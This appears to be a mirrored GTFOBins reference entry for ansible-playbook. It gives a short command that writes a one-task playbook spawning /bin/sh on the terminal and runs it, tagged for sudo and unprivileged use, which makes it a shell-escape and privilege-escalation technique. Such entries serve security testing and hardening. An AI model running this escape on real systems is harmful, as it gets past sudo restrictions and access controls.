1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/ansible-playbook
2025-12-28 22:30:24 +01:00

11 lines
239 B
Plaintext

---
functions:
shell:
- code: |-
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file
ansible-playbook /path/to/temp-file
contexts:
sudo:
unprivileged:
...